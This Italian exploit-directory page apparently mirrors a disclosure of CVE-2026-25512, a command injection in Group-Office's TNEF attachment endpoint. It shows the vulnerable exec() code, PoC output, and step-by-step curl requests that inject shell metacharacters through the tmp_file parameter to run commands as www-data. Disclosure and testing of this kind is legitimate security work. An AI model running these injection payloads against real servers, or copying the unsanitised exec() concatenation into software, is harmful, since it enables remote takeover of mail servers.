Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-25512 — RCE - Iniezione di comandi tramite gestore allegati TNEF | Kitploit
Strumenti/GitHubGitHub/numberoreo1/cve-2026-25512
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubnumberoreo1/cve-2026-25512

CVE-2026-25512

RCE - Iniezione di comandi tramite gestore allegati TNEF

Vedi Repository
17 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-25512: Esecuzione di codice in remoto tramite iniezione di comandi nel gestore TNEF - Group-Office

CVE-2026-25512 Critical CVSS 9.4

CWE-78

Vettore CVSS 4.0 : CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Indice

  • Riepilogo
  • Versioni interessate
  • Dettagli tecnici
    • Causa principale
    • Flusso dalla sorgente al sink
  • Sfruttamento
    • Exploit automatizzato
  • Exploit manuale
  • Impatto
  • Cronologia
  • Riconoscimenti
  • Riferimenti

  • Riepilogo

    È stata identificata una vulnerabilità critica di esecuzione di codice in remoto (RCE) in Group-Office. L'endpoint email/message/tnefAttachmentFromTempFile concatena direttamente il parametro controllabile dall'utente tmp_file in una chiamata exec(). Iniettando metacaratteri di shell in tmp_file, un attaccante autenticato può eseguire comandi arbitrari sul server.


    Versioni interessate

    ProdottoVersioni interessate
    Group-Office≤ 26.0.4

    Dettagli tecnici

    Causa principale

    Il parametro tmp_file viene prelevato dalla richiesta HTTP e utilizzato per costruire un comando di shell senza escaping né validazione. Ciò comporta un'iniezione di comandi nel comando di estrazione tnef, che viene eseguito con i privilegi del server web.

    Codice vulnerabile (www/modules/email/controller/MessageController.php):

    root@kitploit:~
    protected function actionTnefAttachmentFromTempFile(array $params)
    {
        $tmpFolder = \GO\Base\Fs\Folder::tempFolder(uniqid(time()));
        $tmpFile = new \GO\Base\Fs\File(GO::config()->tmpdir.$params['tmp_file']);
    
        chdir($tmpFolder->path());
        exec(GO::config()->cmd_tnef.' -C '.$tmpFolder->path().' '.$tmpFile->path(), $output, $retVar);
        if($retVar!=0)
            throw new \Exception("TNEF extraction failed: ".implode("\n", $output));
    
        exec(GO::config()->cmd_zip.' -r "winmail.zip" *', $output, $retVar);
        if($retVar!=0)
            throw new \Exception("ZIP compression failed: ".implode("\n", $output));
    
        $zipFile = $tmpFolder->child('winmail.zip');
        \GO\Base\Util\Http::outputDownloadHeaders($zipFile,false,true);
        $zipFile->output();
    
        $tmpFolder->delete();
    }
    

    Flusso dalla sorgente al sink

    FaseDescrizione
    SorgenteParametro di query tmp_file in index.php?r=email/message/tnefAttachmentFromTempFile&tmp_file=...
    Propagazionenew \GO\Base\Fs\File(GO::config()->tmpdir.$params['tmp_file'])
    Sinkexec(GO::config()->cmd_tnef.' -C '.$tmpFolder->path().' '.$tmpFile->path(), ...)

    Poiché tmp_file viene concatenato nel comando di shell, metacaratteri come ;, &, backtick o $() consentono a un attaccante di aggiungere comandi arbitrari.

    Requisito di autenticazione: Sì. MessageController applica un controllo CSRF tramite security_token, quindi sono necessari una sessione valida e un token.


    Sfruttamento

    Exploit automatizzato

    Lo script PoC effettua l'accesso, recupera il security_token, inietta un payload tramite tmp_file e verifica l'esecuzione leggendo rce.txt dalla risposta ZIP.

    root@kitploit:~
    python3 poc.py
    

    Output di esempio:

    root@kitploit:~
    ➜  ~ python3 poc.py
    [*] Target: http://xx.xx.xxx.xxx:9090
    [*] Login status: 200
    [*] Login ok, security_token received
    [*] Exploit URL: http://xx.xx.xxx.xxx:9090/index.php?r=email/message/tnefAttachmentFromTempFile
    [*] tmp_file payload: dummy.dat;id > /tmp/id;id > rce.txt;echo RCE_POC_451a735c >> rce.txt;#
    [*] Response status: 200
    [+] RCE Confirmed
    [+] Command output (id):
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

    Exploit manuale

    Passaggio 1: Accesso

    root@kitploit:~
    curl -c cookies.txt -b cookies.txt "http://TARGET:PORT/index.php" \
        --data-urlencode "r=core/auth/login" \
        --data-urlencode "username=YOUR_USERNAME" \
        --data-urlencode "password=YOUR_PASSWORD" \
        -H "X-Requested-With: XMLHttpRequest"
    

    Risposta:

    root@kitploit:~
    {
      "success": true,
      "groupoffice_version": "26.0.4",
      "user_id": 2,
      "security_token": "XXXXXXX",
      "sid": "XXXXXXXXXXX"
    }
    

    Passaggio 2: Attivazione della RCE

    root@kitploit:~
    curl -G "http://TARGET:PORT/index.php" \
        -b cookies.txt \
        --data-urlencode "r=email/message/tnefAttachmentFromTempFile" \
        --data-urlencode "security_token=YOUR_TOKEN" \
        --data-urlencode "tmp_file=dummy.dat;id > rce.txt || true;#" \
        -o command_output.zip
    

    Risultato:

    root@kitploit:~
    ➜  unzip command_output.zip
    Archive:  command_output.zip
      inflating: rce.txt
    
    ➜  cat rce.txt
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    

    Impatto

    CategoriaGravitàDescrizione
    RiservatezzaAltaL'esecuzione arbitraria di comandi consente di leggere file sensibili.
    IntegritàAltaUn attaccante può modificare o eliminare file del server.
    DisponibilitàAltaUn attaccante può interrompere i servizi o eliminare dati critici.

    Riconoscimenti

    • Scoperto da: Oreo

    Riferimenti

    • Sito ufficiale di Group-Office
    • MITRE CVE-2026-25512
    Scarica lo strumento